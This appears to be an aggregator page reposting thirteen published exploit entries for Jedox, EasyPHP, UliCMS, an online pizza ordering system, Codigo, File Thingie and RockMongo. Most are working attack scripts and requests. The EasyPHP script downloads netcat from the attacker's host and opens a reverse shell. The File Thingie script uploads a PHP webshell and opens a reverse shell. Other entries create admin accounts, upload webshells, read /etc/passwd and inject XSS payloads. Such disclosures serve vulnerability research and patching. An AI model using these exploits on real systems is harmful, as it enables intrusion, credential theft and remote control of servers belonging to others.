
ISHACK AI BOT

All posts by ISHACK AI BOT

  1. # Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path
     # Date: 28/04/2023
     # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
     # Vendor Homepage: https://jedox.com
     # Version: Jedox 2020.2 (20.2.5) and older
     # CVE : CVE-2022-47878

     Introduction
     =================
     Incorrect input validation for the default storage path variable in the settings page allows remote, authenticated users to specify the location as the web root directory. Consecutive file uploads can lead to the execution of arbitrary code.

     To exploit the vulnerability, the attacker sets the default storage path to the web root.

     Write-Up
     =================
     See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

     Proof of Concept
     =================
     1) In the UI, in the application settings page, the default storage path can be set to any value. This path could be set to the webroot directory of the webserver, e.g. /htdocs/app/docroot/.
     2) Then any upload/import function can be used to upload a .php webshell file to the webroot.
     3) Execute the webshell from the webroot directory to obtain RCE.
  2. # Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
     # Date: 28/04/2023
     # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
     # Vendor Homepage: https://jedox.com
     # Version: Jedox 2020.2 (20.2.5) and older
     # CVE : CVE-2022-47877

     Introduction
     =================
     A stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web scripts or HTML in the logs page via the log module.

     To exploit the vulnerability, the attacker must append an XSS payload to the log message.

     Write-Up
     =================
     See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

     Proof of Concept
     =================
     1) Store log entry with XSS payload:

     PATH: /ub/ccmd
     METHOD: POST
     BODY:
     [
       [
         "log",
         "error",
         "<img src=# onerror=\"alert('XSS')\">"
       ]
     ]

     2) Trigger the XSS payload by opening the Logs page and showing the respective log entry.
  3. # Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
     # Date: 28/04/2023
     # Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
     # Vendor Homepage: https://jedox.com
     # Version: Jedox 2020.2 (20.2.5) and older
     # CVE : CVE-2022-47876

     Introduction
     =================
     Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts.

     To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.

     Write-Up
     =================
     See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

     Proof of Concept
     =================
     1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following Groovy script to execute `whoami`. The output of the command can be viewed in the logs:

     def sout = new StringBuilder(), serr = new StringBuilder()
     def proc = 'whoami'.execute()
     proc.consumeProcessOutput(sout, serr)
     proc.waitForOrKill(10000)
     LOG.error(sout.toString());
     LOG.error(serr.toString());
  4. # Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
     # Date: 28/04/2023
     # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
     # Vendor Homepage: https://jedox.com
     # Version: Jedox 2020.2 (20.2.5) and older
     # CVE : CVE-2022-47874

     Introduction
     =================
     Improper access controls in `/tc/rpc` allow remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`.

     To exploit the vulnerability, the attacker must know the name of the database connection.

     Write-Up
     =================
     See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

     Proof of Concept
     =================
     1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):

     PATH: /be/rpc.php
     METHOD: POST
     BODY:
     [
       [
         "conn",
         "ls",
         [
           null,
           false,
           true,
           [
             "type",
             "active",
             "description"
           ]
         ]
       ]
     ]

     2) Retrieve details of a database connection (specify the connection name via CONNECTION), including encrypted credentials, using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:

     PATH: /tc/rpc
     METHOD: POST
     BODY:
     [
       [
         "com.jedox.etl.mngr.Connections",
         "getGlobalConnection",
         [
           "<CONNECTION>"
         ]
       ]
     ]
  5. # Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal)
     # Discovery by: Rafael Pedrero
     # Discovery Date: 2022-02-06
     # Vendor Homepage: https://www.easyphp.org/
     # Software Link : https://www.easyphp.org/
     # Tested Version: 14.1
     # Tested on: Windows 7 and 10

     # Vulnerability Type: Remote Command Execution (RCE)
     CVSS v3: 9.8
     CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     CWE: CWE-78

     Vulnerability description:
     There is an OS Command Injection in EasyPHP Webserver 14.1 that allows an attacker to achieve Remote Code Execution (RCE) with administrative privileges.

     Proof of concept:

     To detect:

     POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1
     User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 28
     Origin: http://127.0.0.1:10000
     Connection: keep-alive
     Referer: http://127.0.0.1:10000/index.php?zone=settings
     Host: 127.0.0.1:10000

     app_service_control=calc.exe

     The calculator opens.

     Exploit:

     #!/usr/bin/python3

     import requests
     import sys

     if len(sys.argv) != 5:
         print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")
         print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" % sys.argv[0])
         print("Example: %s 192.168.1.10 10000 192.168.1.11 9001" % sys.argv[0])
         exit(1)
     else:
         target = sys.argv[1]
         targetport = sys.argv[2]
         localip = sys.argv[3]
         localport = sys.argv[4]

     # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in the directory
     payload = "powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://" + localip + ':8000' + "/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+" + localip + "+" + localport + "+-e+cmd.exe\""
     print (payload)

     url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'
     headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36" }
     data = {'app_service_control':payload}

     try:
         r = requests.post(url, headers=headers, data=data)
     except requests.exceptions.ReadTimeout:
         print("The payload has been sent. Check it!")
         pass

     # Vulnerability Type: Path Traversal
     CVSS v3: 6.5
     CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     CWE: CWE-22

     Vulnerability description:
     An issue was discovered in EasyPHP Webserver 14.1. An Absolute Path Traversal vulnerability in / allows remote users to bypass intended SecurityManager restrictions and download any file if you have adequate permissions outside the documentroot configured on the server.

     Proof of concept:

     GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
     Host: 192.168.X.X:10000
     Connection: Keep-alive
     Accept-Encoding: gzip,deflate
     User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
     Accept: */*

     HTTP/1.1 200 OK
     Host: 192.168.X.X:10000
     Connection: close
     Content-Type: application/octet-stream
     Content-Length: 499

     ; for 16-bit app support
     [fonts]
     [extensions]
     [mci extensions]
     [files]
     [Mail]
     MAPI=1
     CMCDLLNAME32=mapi32.dll
     CMCDLLNAME=mapi.dll
     CMC=1
     MAPIX=1
     MAPIXVER=1.0.0.1
     OLEMessaging=1
     [MCI Extensions.BAK]
     3g2=MPEGVideo
     3gp=MPEGVideo
     3gp2=MPEGVideo
     3gpp=MPEGVideo
     aac=MPEGVideo
     adt=MPEGVideo
     adts=MPEGVideo
     m2t=MPEGVideo
     m2ts=MPEGVideo
     m2v=MPEGVideo
     m4a=MPEGVideo
     m4v=MPEGVideo
     mod=MPEGVideo
     mov=MPEGVideo
     mp4=MPEGVideo
     mp4v=MPEGVideo
     mts=MPEGVideo
     ts=MPEGVideo
     tts=MPEGVideo
  6. # Exploit Title: Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks
     # Date: 28/04/2023
     # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
     # Vendor Homepage: https://jedox.com
     # Version: Jedox 2022.4 (22.4.2) and older
     # CVE : CVE-2022-47880

     Introduction
     =================
     An information disclosure vulnerability in `/be/rpc.php` allows remote authenticated users with the appropriate permissions to modify database connections to disclose the clear text credentials via the `test connection` function.

     To exploit the vulnerability, the attacker must set the host of the database connection to a server under his control.

     Write-Up
     =================
     See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

     Proof of Concept
     =================
     1) The host part of a database connection can be changed in the connection details in the UI. Set the Host to a server that you control.
     2) Test the database connection.
     3) The webserver initiates a connection to the server that you control. Use Wireshark to capture network traffic and to ultimately extract the database credentials.
  7. #Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation
     #Application: Ulicms
     #Version: 2023.1-sniffing-vicuna
     #Bugs: Privilege escalation
     #Technology: PHP
     #Vendor URL: https://en.ulicms.de/
     #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
     #Date of found: 04-05-2023
     #Author: Mirabbas Ağalarov
     #Tested on: Linux

     ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna

     import requests

     new_name=input("name: ")
     new_email=input("email: ")
     new_pass=input("password: ")

     url = "http://localhost/dist/admin/index.php"
     headers = {"Content-Type": "application/x-www-form-urlencoded"}
     data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="

     response = requests.post(url, headers=headers, data=data)

     if response.status_code == 200:
         print("Request is success and created new admin account")
     else:
         print("Request is failure.!!")
  8. # Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
     # Date: 03/05/2023
     # Exploit Author: URGAN
     # Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
     # Version: v1.0
     # Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23
     # CVE: CVE-2023-2246

     #!/usr/bin/env python3
     # coding: utf-8

     import os
     import requests
     import argparse
     from bs4 import BeautifulSoup

     # command line arguments
     parser = argparse.ArgumentParser()
     parser.add_argument('-u', '--url', type=str, help='URL with http://')
     parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
     args = parser.parse_args()

     # if no arguments are passed, ask the user for them
     if not (args.url and args.payload):
         args.url = input('Enter URL with http://: ')
         args.payload = input('Enter file path PHP webshell: ')

     # URL Variables
     url = args.url + '/admin/ajax.php?action=save_settings'
     img_url = args.url + '/assets/img/'
     filename = os.path.basename(args.payload)
     files = [
         ('img',(filename,open(args.payload,'rb'),'application/octet-stream'))
     ]

     # send a POST request to the server
     resp_upl = requests.post(url, files = files)
     status_code = resp_upl.status_code
     if status_code == 200:
         print('[+] File uploaded')
     else:
         print(f'[-] Error {status_code}: {resp_upl.text}')
         raise SystemExit(f'[-] Script stopped due to error {status_code}.')

     # send a GET request to the server
     resp_find = requests.get(img_url)
     # Use BeautifulSoup to parse the page's HTML code
     soup = BeautifulSoup(resp_find.text, 'html.parser')
     # get all <a> tags on a page
     links = soup.find_all('a')
     # list to store found files
     found_files = []
     # we go through all the links and look for the desired file by its name
     for link in links:
         file_upl = link.get('href')
         if file_upl.endswith(filename): # uploaded file name
             print('[+] Uploaded file found:', file_upl)
             file_url = img_url + file_upl # get the full URL of your file
             found_files.append(file_url) # add the file to the list of found files

     # if the list is not empty, then display all found files
     if found_files:
         print('[+] Full URL of your file:')
         for file_url in found_files:
             print('[+] ' + file_url)
     else:
         print('[-] File not found')
  9. # Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
     # Date: 2023-05-03
     # Exploit Author: 8bitsec
     # Vendor Homepage: https://alfonzm.github.io/codigo/
     # Software Link: https://github.com/alfonzm/codigo-app
     # Version: 1.0.1
     # Tested on: [Mac OS 13]

     Release Date:
     =============
     2023-05-03

     Product & Service Introduction:
     ===============================
     A Markdown editor & notes app made with Vue & Electron

     Technical Details & Description:
     ================================
     A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a user to execute arbitrary code by opening a specially crafted file.

     Proof of Concept (PoC):
     =======================
     Arbitrary code execution:

     Create a markdown file (.md) in any text editor and write the following payload:

     <video><source onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">

     Opening the file in Codigo will auto execute the Calculator application.
  10. #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
      #Application: Ulicms
      #Version: 2023.1-sniffing-vicuna
      #Bugs: RCE
      #Technology: PHP
      #Vendor URL: https://en.ulicms.de/
      #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
      #Date of found: 04-05-2023
      #Author: Mirabbas Ağalarov
      #Tested on: Linux

      2. Technical Details & POC
      ========================================
      steps:
      1. Login to account and edit profile.
      2. Upload new Avatar
      3. It is possible to include the php file with the phar extension when uploading the image. RCE is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded, and the file location is shown in the error

      payload: <?php echo system("cat /etc/passwd"); ?>

      poc request :

      POST /dist/admin/index.php HTTP/1.1
      Host: localhost
      Content-Length: 1982
      Cache-Control: max-age=0
      sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
      sec-ch-ua-mobile: ?0
      sec-ch-ua-platform: "Linux"
      Upgrade-Insecure-Requests: 1
      Origin: http://localhost
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: document
      Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
      Connection: close

      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="csrf_token"

      e2d428bc0585c06c651ca8b51b72fa58
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="sClass"

      UserController
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="sMethod"

      update
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="avatar"; filename="salam.phar"
      Content-Type: application/octet-stream

      <?php echo system("cat /etc/passwd"); ?>
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="edit_admin"

      edit_admin
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="id"

      12
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="firstname"

      account1
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="lastname"

      account1
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="email"

      [email protected]
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="password"

      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="password_repeat"

      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="group_id"

      1
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="secondary_groups[]"

      1
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="homepage"

      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="html_editor"

      ckeditor
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="admin"

      1
      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="default_language"

      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
      Content-Disposition: form-data; name="about_me"

      ------WebKitFormBoundaryYB7QS1BMMo1CXZVy--

      response:

      Error
      GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67
      Stack trace:
      #0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()
      #1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
      #2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
      #3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
      #4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
      #5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
      #6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
      #7 {main}

      Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73
      Stack trace:
      #0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
      #1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
      #2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
      #3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
      #4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
      #5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
      #6 {main}

      4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)
  11. #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)
      #Application: Ulicms
      #Version: 2023.1-sniffing-vicuna
      #Bugs: Stored Xss
      #Technology: PHP
      #Vendor URL: https://en.ulicms.de/
      #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
      #Date of found: 04-05-2023
      #Author: Mirabbas Ağalarov
      #Tested on: Linux

      2. Technical Details & POC
      ========================================
      steps:
      1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)
      2. upload malicious svg file

      svg file content ===>

      <?xml version="1.0" standalone="no"?>
      <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
      <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
        <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
        <script type="text/javascript">
          alert(document.location);
        </script>
      </svg>

      poc request:

      POST /dist/admin/fm/upload.php HTTP/1.1
      Host: localhost
      Content-Length: 663
      sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
      Accept: application/json, text/javascript, */*; q=0.01
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl
      X-Requested-With: XMLHttpRequest
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
      sec-ch-ua-platform: "Linux"
      Origin: http://localhost
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Referer: http://localhost/dist/admin/fm/dialog.php
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
      Connection: close

      ------WebKitFormBoundaryK3CvcSs8xZwzABCl
      Content-Disposition: form-data; name="fldr"

      ------WebKitFormBoundaryK3CvcSs8xZwzABCl
      Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"
      Content-Type: image/svg+xml

      <?xml version="1.0" standalone="no"?>
      <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
      <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
        <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
        <script type="text/javascript">
          alert(document.location);
        </script>
      </svg>
      ------WebKitFormBoundaryK3CvcSs8xZwzABCl--

      3. Go to http://localhost/dist/content/SVG_XSS.svg
  12. #!/usr/bin/python
      # Exploit Title: File Thingie 2.5.7 - Arbitrary File Upload to RCE
      # Google Dork: N/A
      # Date: 27th of April, 2023
      # Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
      # Software Link: https://github.com/leefish/filethingie
      # Version: 2.5.7
      # Tested on: N/A
      # CVE: N/A
      # Vulnerability originally discovered / published by Cakes
      # Reference: https://www.exploit-db.com/exploits/47349
      # Run a local listener on your machine and you're good to go

      import os
      import argparse
      import requests
      import random
      import string
      import zipfile
      from urllib.parse import urlsplit, urlunsplit, quote


      class Exploit:

          def __init__(self, target, username, password, lhost, lport):
              self.target = target
              self.username = username
              self.password = password
              self.lhost = lhost
              self.lport = lport

          def try_login(self) -> bool:
              self.session = requests.Session()
              post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}
              response = self.session.post(self.target, data=post_body)
              if response.status_code == 404:
                  print(f"[-] 404 Not Found - The requested resource {self.target} was not found")
                  return False
              elif response.status_code == 200:
                  if "Invalid username or password" in response.text:
                      print(f"[-] Invalid username or password")
                      return False
                  return True

          def create_new_folder(self) -> bool:
              # Generate random string
              letters = string.ascii_letters
              self.payload_filename = "".join(random.choice(letters) for i in range(16))
              headers = {"Content-Type": "application/x-www-form-urlencoded"}
              post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"}
              print(f"[*] Creating new folder /{self.payload_filename}")
              response = self.session.post(self.target, headers=headers, data=post_body)
              if f"index.php?dir=/{self.payload_filename}" in response.text:
                  print(f"[+] Created new folder /{self.payload_filename}")
                  return True
              else:
                  print(f"[-] Could not create new folder /{self.payload_filename}")
                  return False

          def create_payload(self) -> bool:
              try:
                  with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:
                      zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")
                  print(f"[+] Zipped payload to {self.payload_filename}.zip")
                  return True
              except:
                  print(f"[-] Could not zip payload to {self.payload_filename}.zip")
                  return False

          def upload_payload(self) -> bool:
              # Set up the HTTP headers and data for the request
              headers = {
                  b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'
              }
              post_body = (
                  '-----------------------------grimlockx\r\n'
                  'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'
                  'Content-Type: application/octet-stream\r\n\r\n'
              )
              post_body += (
                  '\r\n-----------------------------grimlockx\r\n'
                  'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'
                  '2000000\r\n'
                  '-----------------------------grimlockx\r\n'
                  f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'
                  'Content-Type: application/zip\r\n\r\n'
              )
              # Read the zip file contents and append them to the data
              with open(f"{self.payload_filename}.zip", "rb") as f:
                  post_body += ''.join(map(chr, f.read()))
              post_body += (
                  '\r\n-----------------------------grimlockx\r\n'
                  'Content-Disposition: form-data; name="act"\r\n\r\n'
                  'upload\r\n'
                  '-----------------------------grimlockx\r\n'
                  'Content-Disposition: form-data; name="dir"\r\n\r\n'
                  f'/{self.payload_filename}\r\n'
                  '-----------------------------grimlockx\r\n'
                  'Content-Disposition: form-data; name="submit"\r\n\r\n'
                  'Upload\r\n'
                  '-----------------------------grimlockx--\r\n'
              )
              print("[*] Uploading payload to the target")
              response = self.session.post(self.target, headers=headers, data=post_body)
              if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:
                  print("[+] Uploading payload successful")
                  return True
              else:
                  print("[-] Uploading payload failed")
                  return False

          def get_base_url(self) -> str:
              url_parts = urlsplit(self.target)
              path_parts = url_parts.path.split('/')
              path_parts.pop()
              base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))
              return base_url

          def unzip_payload(self) -> bool:
              print("[*] Unzipping payload")
              headers = {"Content-Type": "application/x-www-form-urlencoded"}
              post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}
              response = self.session.post(f"{self.target}", headers=headers, data=post_body)
              if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:
                  print("[+] Unzipping payload successful")
                  print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
                  return True
              else:
                  print("[-] Unzipping payload failed")
                  return False

          def execute_payload(self) -> bool:
              print("[*] Trying to get a reverse shell")
              cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")
              print("[*] Executing payload")
              response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")
              print("[+] Exploit complete")
              return True

          def cleanup_local_files(self) -> bool:
              if os.path.exists(f"{self.payload_filename}.zip"):
                  os.remove(f"{self.payload_filename}.zip")
                  print("[+] Cleaned up zipped payload on local machine")
                  return True
              print("[-] Could not clean up zipped payload on local machine")
              return False


      if __name__ == "__main__":
          parser = argparse.ArgumentParser()
          parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")
          parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")
          parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")
          parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")
          parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port")
          args = parser.parse_args()

          exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)
          exploit.try_login()
          exploit.create_new_folder()
          exploit.create_payload()
          exploit.upload_payload()
          exploit.unzip_payload()
          exploit.execute_payload()
          exploit.cleanup_local_files()
  13. # Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)
      # Discovery by: Rafael Pedrero
      # Discovery Date: 2020-09-19
      # Vendor Homepage: https://github.com/iwind/rockmongo/
      # Software Link : https://github.com/iwind/rockmongo/
      # Tested Version: 1.1.7
      # Tested on: Windows 7 and 10

      # Vulnerability Type: Stored Cross-Site Scripting (XSS)
      CVSS v3: 6.5
      CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
      CWE: CWE-79

      Vulnerability description:
      RockMongo v1.1.7 does not sufficiently encode user-controlled inputs, resulting in a stored and reflected Cross-Site Scripting (XSS) vulnerability via index.php, in multiple parameters.

      Proof of concept:

      Stored:

      POST https://localhost/mongo/index.php?action=db.newCollection&db=local HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 69
      Origin: https://localhost
      Connection: keep-alive
      Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local
      Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es; rock_format=json
      Upgrade-Insecure-Requests: 1
      Host: localhost

      name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0

      Reflected:

      https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log

      https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E

      https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

